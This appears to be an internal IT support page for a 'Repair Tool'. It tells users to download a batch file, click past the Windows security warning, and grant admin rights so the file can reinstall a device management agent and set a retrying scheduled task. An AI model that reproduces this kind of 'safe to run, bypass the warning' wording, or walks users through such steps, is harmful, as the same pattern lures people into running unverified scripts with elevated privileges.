Repair Tool

Your IT team has sent you here to fix a connectivity issue with your device's management software. The process is automatic — you only need to do three things.

⚠️
Before you start: Make sure your device is plugged into power and connected to the internet (Wi-Fi or ethernet). Do not close your laptop lid or shut down your computer while the repair is running.
What you need to do
1
Click the download button below
Your browser will download a file called TekSoftRepair.bat. It will appear in your Downloads folder or at the bottom of your browser window.
Takes about 2 seconds
2
Open the downloaded file
Find TekSoftRepair.bat in your Downloads folder and double-click it. Windows may show a blue or grey security prompt — this is normal. Click "More info" then "Run anyway" if prompted.
You may see a Windows security prompt — this is expected
3
Click "Yes" when Windows asks for permission
A box will appear asking if you want to allow the program to make changes to your device. Click Yes. That's it — you're done. The repair will run automatically in the background. You can keep using your computer normally.
This is the last thing you need to do

TekSoftRepair.bat — safe to run, provided by your IT team
Repair files are prepared
The tool creates a working folder and downloads everything it needs to fix your device.
Management software is removed
Your device's IT management agent is uninstalled. Your device may briefly appear offline to your IT team — this is expected.
Cleanup runs
A cleanup tool resets the device's unique identifier so it is recognized correctly going forward.
Management software is reinstalled
The correct version of the IT management agent is installed fresh for your organization.
Your device checks back in
The agent reconnects to your IT team's systems. If anything doesn't complete, it will automatically retry every 15 minutes and again after any reboot — no action needed from you.
Repair completes and cleans up after itself
Once successful, the scheduled task removes itself. Nothing is left running in the background.
